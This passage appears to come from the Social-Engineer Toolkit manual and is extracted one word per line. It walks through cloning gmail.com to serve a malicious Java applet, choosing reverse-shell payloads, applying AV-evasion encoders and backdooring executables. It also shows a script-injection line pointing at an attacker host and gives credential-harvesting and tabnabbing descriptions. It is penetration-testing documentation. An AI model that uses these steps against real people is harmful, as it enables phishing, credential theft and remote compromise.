Toolkit
Enter
your
choice:
2
The
Social-Engineer
Toolkit
"Web
Attack"
vector
is
a
unique
way
of
utilizing
multiple
web-based
attacks
in
order
to
compromise
the
intended
victim.
irc.freenode.net #social-engineer
61
Enter
what
type
of
attack
you
would
like
to
utilize.
The
Java
Applet
attack
will
spoof
a
Java
Certificate
and
deliver
a
metasploit
based
payload.
Uses
a
customized
java
applet
created
by
Thomas
Werth
to
deliver
the
payload.
The
Metasploit
browser
exploit
method
will
utilize
select
Metasploit
browser
exploits
through
an
iframe
and
deliver
a
Metasploit
payload.
The
Credential
Harvester
Method
will
utilize
web
cloning
of
a
website
that
has
a
username
and
password
field
and
harvest
all
the
information
posted
to
the
website.
The
TabNabbing
Method
will
wait
for
a
user
to
move
to
a
different
tab,
then
refresh
the
page
to
something
different.
The
Man
Left
in
the
Middle
Attack
Method
was
introduced
by
Kos
and
utilizes
HTTP
REFERER's
in
order
to
intercept
fields
and
harvest
data
from
them.
You
need
to
have
an
already
vulnerable
site
and
incorporate
<script
src="http://YOURIP/">.
This
could
either
be
from
a
compromised
site
or
through
XSS.
The
web
jacking
attack
method
was
introduced
by
white_sheep,
Emgent
and
the
Back|Track
team.
This
method
utilizes
iframe
replacements
to
make
the
highlighted
URL
link
to
appear
legitimate
however
when
clicked
a
window
pops
up
then
is
replaced
with
the
malicious
link.
You
can
edit
the
link
replacement
settings
in
the
set_config
if
its
too
slow/fast.
The
multi-attack
will
add
a
combination
of
attacks
through
the
web
attack
menu.
For
example
you
can
utilize
the
Java
Applet,
Metasploit
Browser,
Credential
Harvester/Tabnabbing,
and
the
Man
Left
in
the
Middle
attack
all
at
once
to
see
which
is
successful.
1.
The
Java
Applet
Attack
Method
2.
The
Metasploit
Browser
Exploit
Method
3.
Credential
Harvester
Attack
Method
4.
Tabnabbing
Attack
Method
5.
Man
Left
in
the
Middle
Attack
Method
6.
Web
Jacking
Attack
Method
7.
Multi-Attack
Web
Method
8.
Return
to
the
previous
menu
Enter
your
choice
(press
enter
for
default):
1
irc.freenode.net
#social-engineer
62
The
first
method
will
allow
SET
to
import
a
list
of
pre-defined
web
applications
that
it
can
utilize
within
the
attack.
The
second
method
will
completely
clone
a
website
of
your
choosing
and
allow
you
to
utilize
the
attack
vectors
within
the
completely
same
web
application
you
were
attempting
to
clone.
The
third
method
allows
you
to
import
your
own
website,
note
that
you
should
only
have
an
index.html
when
using
the
import
website
functionality.
[!]
Website
Attack
Vectors
[!]
1.
Web
Templates
2.
Site
Cloner
3.
Custom
Import
4.
Return
to
main
menu
Enter
number
(1-4):
2
SET
supports
both
HTTP
and
HTTPS
Example:
http://www.thisisafakesite.com
Enter
the
url
to
clone:
https://gmail.com
[*]
Cloning
the
website:
https://gmail.com
[*]
This
could
take
a
little
bit...
[*]
Injecting
Java
Applet
attack
into
the
newly
cloned
website.
[*]
Filename
obfuscation
complete.
Payload
name
is:
8J5ovr0lC9tW
[*]
Malicious
java
applet
website
prepped
for
deployment
What
payload
do
you
want
to
generate:
Name:
Description:
1.
Windows
Shell
Reverse_TCP
Spawn
a
command
shell
on
victim
and
send
back
to
attacker.
2.
Windows
Reverse_TCP
Meterpreter
Spawn
a
meterpreter
shell
on
victim
and
send
back
to
attacker.
3.
Windows
Reverse_TCP
VNC
DLL
Spawn
a
VNC
server
on
victim
and
send
back
to
attacker.
4.
Windows
Bind
Shell
Execute
payload
and
create
an
accepting
port
on
remote
system.
5.
Windows
Bind
Shell
X64
Windows
x64
Command
Shell,
Bind
TCP
Inline
irc.freenode.net
#social-engineer
63
6.
Windows
Shell
Reverse_TCP
X64
Windows
X64
Command
Shell,
Reverse
TCP
Inline
7.
Windows
Meterpreter
Reverse_TCP
X64
Connect
back
to
the
attacker
(Windows
x64),
Meterpreter
8.
Windows
Meterpreter
Egress
Buster
Spawn
a
meterpreter
shell
and
find
a
port
home
via
multiple
ports
9.
Windows
Meterpreter
Reverse
HTTPS
Tunnel
communication
over
HTTP
using
SSL
and
use
Meterpreter
10.
Windows
Meterpreter
Reverse
DNS
Tunnel
communications
over
DNS
and
spawn
a
Meterpreter
console
11.
Import
your
own
executable
Specify
a
path
for
your
own
executable
Enter
choice
(hit
enter
for
default):
Below
is
a
list
of
encodings
to
try
and
bypass
AV.
Select
one
of
the
below,
'backdoored
executable'
is
typically
the
best.
1.
avoid_utf8_tolower
(Normal)
2.
shikata_ga_nai
(Very
Good)
3.
alpha_mixed
(Normal)
4.
alpha_upper
(Normal)
5.
call4_dword_xor
(Normal)
6.
countdown
(Normal)
7.
fnstenv_mov
(Normal)
8.
jmp_call_additive
(Normal)
9.
nonalpha
(Normal)
10.
nonupper
(Normal)
11.
unicode_mixed
(Normal)
12.
unicode_upper
(Normal)
13.
alpha2
(Normal)
14.
No
Encoding
(None)
15.
Multi-Encoder
(Excellent)
16.
Backdoored
Executable
(BEST)
Enter
your
choice
(enter
for
default):
[-]
Enter
the
PORT
of
the
listener
(enter
for
default):
[-]
Backdooring
a
legit
executable
to
bypass
Anti-Virus.
Wait
a
few
seconds...
[-]
Backdoor
completed
successfully.
Payload
is
now
hidden
within
a
legit
executable.
********************************************************
Do
you
want
to
create
a
Linux/OSX
reverse_tcp
payload
in
the
Java
Applet
attack
as
well?
********************************************************
irc.freenode.net
#social-engineer
64
Enter
choice
yes
or
no:
no
Looking
through
the
options,
we
selected:
1
2
1
https://gmail.com
no
If
you
create
a
text
file
called
moo.txt
or
whatever
you
want
and
input
that
into
it
you
can
call
set-automate
and
it
will
enter
it
for
you
each
time.
root@bt:/pentest/exploits/set#
./set-automate
moo.txt
[*]
Spawning
SET
in
a
threaded
process...
[*]
Sending
command
1
to
the
interface...
[*]
Sending
command
2
to
the
interface...
[*]
Sending
command
1
to
the
interface...
[*]
Sending
command
https://gmail.com
to
the
interface...
[*]
Sending
command
default
to
the
interface...
[*]
Sending
command
default
to
the
interface...
[*]
Sending
command
default
to
the
interface...
[*]
Sending
command
no
to
the
interface...
[*]
Sending
command
default
to
the
interface...
[*]
Finished
sending
commands,
interacting
with
the
interface..
SET Web-Interface
The
web
interface
for
the
Social-Engineer
Toolkit
takes
whatever
you
select
and
generates
an
answer
file
that
is
ultimately
placed
into
set-automate.
Each
response
assigns
a
given
value
and
the
built
in
intelligence
on
the
back-end
parses
your
responses
into
building
and
crafting
the
attack
into
SET.
To
turn
the
web
interface
simply
type
./set-web
root@bt:/pentest/exploits/set#
./set-web
[*]
Starting
the
SET
Command
Center
on
port:
44444
irc.freenode.net #social-engineer
65
|
|
|
|
|
The
Social-Engineer
Toolkit
|
|
Command
Center
|
|
|
|
May
the
pwn
be
with
you
|
|______________________________________________________|
All
results
from
the
web
interface
will
be
displayed
in
this
terminal.
[*]
Interface
is
bound
to
http://127.0.0.1
on
port
44444
(open
browser
to
ip/port)
Once
the
SET
Web
Interface
is
running,
browse
to
localhost:44444.
SET
will
only
listen
on
localhost,
you
will
not
be
able
to
get
to
it
remotely.
The
web
interface
should
be
pretty
self-explanatory
if
youre
familiar
with
the
menu
mode.
One
thing
to
note
is
that
under
the
updates
menu,
youll
notice
that
you
can
dynamically
edit
the
configuration
options.
When
you
save
the
new
settings
to
the
file,
it
will
actually
propagate
different
options
in
different
menus.
For
example,
if
you
turn
on
self-signed-applets
to
ON,
new
options
will
appear
under
the
web
attack
menu.
Otherwise,
the
options
will
remain
hidden.
To
launch
an
attack,
just
click
on
irc.freenode.net
#social-engineer
66
one
of
the
attack
vectors,
fill
out
the
appropriate
attacks
and
hit
launch
attack.
Check
your
window
that
you
launched
the
web
interface
on,
and
you
should
see
the
attack
being
launched.
In
an
effort
to
avoid
confusion
and
help
understand
some
of
the
common
questions
with
SET.
Q.
Im
using
NAT/Port
forwarding,
how
can
I
configure
SET
to
support
this
scenario?
A.
Edit
the
config/set_config
file
and
turn
AUTO_DETECT=ON
to
AUTO_DETECT=OFF.
Once
this
option
is
you
will
be
prompted
with
the
following
questions:
NAT/Port
Forwarding
can
be
used
in
the
cases
where
your
SET
machine
is
not
externally
exposed
and
may
be
a
different
IP
address
than
your
reverse
listener.
Are
you
using
NAT/Port
Forwarding?
yes
or
no:
yes
Enter
the
IP
address
to
your
SET
web
server
(external
IP
or
hostname):
externalipgoeshere
In
some
cases
you
may
have
your
listener
on
a
different
IP
address,
if
this
is
the
case
the
next
question
asks
if
your
IP
address
is
different
for
the
reverse
handler/listener.
If
that
is
the
case,
specify
yes,
and
enter
your
separate
IP
address
for
the
listener.
Is
your
payload
handler
(metasploit)
on
a
different
IP
from
your
external
NAT/Port
FWD
address
(yes
or
no):
yes
Enter
the
IP
address
for
the
reverse
handler
(reverse
payload):
otherexternalipgoeshere
Q.
My
Java
Applet
isnt
working
correctly
and
dont
get
prompted
for
the
Applet
when
browsing
the
site.
A.
You
either
do
not
have
Java
installed
on
the
victim
machine,
or
your
using
a
NAT/Port
forwarding
scenario
and
you
need
to
turn
AUTO_DETECT=ON
to
AUTO_DETECT=OFF.
If
you
do
a
view
source
on
the
webpage,
the
applet
should
be
downloaded
from
your
IP
address
that
is
accessible
from
the
victim.
In
some
cases
SET
may
grab
the
wrong
interface
IP
as
well,
in
this
scenario
you
again
will
want
to
edit
the
set_config
and
turn
AUTO_DETECT
to
OFF
irc.freenode.net #social-engineer
67